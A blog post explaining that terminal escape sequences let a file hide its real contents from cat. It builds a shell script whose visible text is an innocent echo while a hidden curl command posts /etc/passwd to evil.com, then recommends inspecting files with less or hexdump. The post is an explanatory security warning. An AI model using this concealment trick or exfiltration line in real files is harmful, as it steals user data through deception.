Don’t trust cat
!
To read a file foo
in the terminal, we do cat foo
, and the contents of the file are printed out. But because terminal control sequences are in-band as ordinary stdout bytes, cat
ting a file can do more than you think! You should not trust the visual output of cat as a faithful representation of the file contents.
This program clears the screen:
#include <stdio.h>
int main() { printf("\033c"); return 0; }
We can achieve the same thing with the printf
program in the CLI:
printf "\033c"
Because those are just bytes over stdout, we can write them to a file, and read from the file. This does the same thing and clears the screen:
printf "\033c" > clear_screen
cat clear_screen
There are all kinds of ANSI control sequences; you should consider the byte stream to have arbitrary control over your screen.
A file could look like a normal plaintext file with cat
, but contain secret other bytes. Here’s an example using the sequence <ESC>[9D
, which deletes the previous 9 characters.
$ printf "invisible\033[9Dsome boring plaintext\n" > boring
~/dev/tmp/clear
$ cat boring
some boring plaintext
This is a clear opportunity for malicious files. The following constructs a shell file which looks innocent, but contains a secret command which uploads sensitive files to a remote server:
$ printf 'curl --data-binary @/etc/passwd https://evil.com;\033[2K\033[49Decho "You look great!"\n' > hello.sh
$ chmod +x hello.sh
$ cat hello.sh
echo "You look great!"
$ ./hello.sh # Uh-oh
The shell chokes once it reaches the escape sequences, but by then it’s too late: the shell has already run the malicious command and our secrets are leaked!
First, the file contains the malicious command, which is 49 characters long. Next, it has the escape sequence <ESC>[2K
which clears the current line, then the escape sequence <ESC>[49D
to delete the previous 49 characters. At this point, we’re back to looking like a blank file. Finally we put in some nice-looking commands to convince the user to run the file.
Don’t trust cat
! If there’s any possibility of malice, then inspect the file with less
, or even hexdump -C
.
Tagged .
Similar posts
More by Jim
What does the dot do in JavaScript?
foo.bar
, foo.bar()
, or foo.bar = baz
- what do they mean? A deep dive into prototypical inheritance and getters/setters. 2020-11-01
Smear phishing: a new Android vulnerability
Trick Android to display an SMS as coming from any contact. Convincing phishing vuln, but still unpatched. 2020-08-06
A probabilistic pub quiz for nerds
A “true or false” quiz where you respond with your confidence level, and the optimal strategy is to report your true belief. 2020-04-26
Time is running out to catch COVID-19
Simulation shows it’s rational to deliberately infect yourself with COVID-19 early on to get treatment, but after healthcare capacity is exceeded, it’s better to avoid infection. Includes interactive parameters and visualizations. 2020-03-14
The inception bar: a new phishing method
A new phishing technique that displays a fake URL bar in Chrome for mobile. A key innovation is the “scroll jail” that traps the user in a fake browser. 2019-04-27
The hacker hype cycle
I got started with simple web development, but because enamored with increasingly esoteric programming concepts, leading to a “trough of hipster technologies” before returning to more productive work. 2019-03-23
Project C-43: the lost origins of asymmetric crypto
Bob invents asymmetric cryptography by playing loud white noise to obscure Alice’s message, which he can cancel out but an eavesdropper cannot. This idea, published in 1944 by Walter Koenig Jr., is the forgotten origin of asymmetric crypto. 2019-02-16
How Hacker News stays interesting
Hacker News buried my post on conspiracy theories in my family due to overheated discussion, not censorship. Moderation keeps the site focused on interesting technical content. 2019-01-26
My parents are Flat-Earthers
For decades, my parents have been working up to Flat-Earther beliefs. From Egyptology to Jehovah’s Witnesses to theories that human built the Moon billions of years in the future. Surprisingly, it doesn’t affect their successful lives very much. For me, it’s a fun family pastime. 2019-01-20
The dots do matter: how to scam a Gmail user
Gmail’s “dots don’t matter” feature lets scammers create an account on, say, Netflix, with your email address but different dots. Results in convincing phishing emails. 2018-04-07
The sorry state of OpenSSL usability
OpenSSL’s inadequate documentation, confusing key formats, and deprecated interfaces make it difficult to use, despite its importance. 2017-12-02
I hate telephones
I hate telephones. Some rational reasons: lack of authentication, no spam filtering, forced synchronous communication. But also just a visceral fear. 2017-11-08
The Three Ts of Time, Thought and Typing: measuring cost on the web
Businesses often tout “free” services, but the real costs come in terms of time, thought, and typing required from users. Reducing these “Three Ts” is key to improving sign-up flows and increasing conversions. 2017-10-26
Granddad died today
Granddad died. The unspoken practice of death-by-dehydration in the NHS. The Liverpool Care Pathway. Assisted dying in the UK. The importance of planning in end-of-life care. 2017-05-19
How do I call a program in C, setting up standard pipes?
A C function to create a new process, set up its standard input/output/error pipes, and return a struct containing the process ID and pipe file descriptors. 2017-02-17
Your syntax highlighter is wrong
Syntax highlighters make value judgments about code. Most highlighters judge that comments are cruft, and try to hide them. Most diff viewers judge that code deletions are bad. 2014-05-11
Want to build a fantastic product using LLMs? I work at
Granola where we're building the future IDE for knowledge work. Come and work with us!
Read more or
get in touch! This page copyright James Fisher 2017. Content is not associated with my employer. Found an error? Edit this page.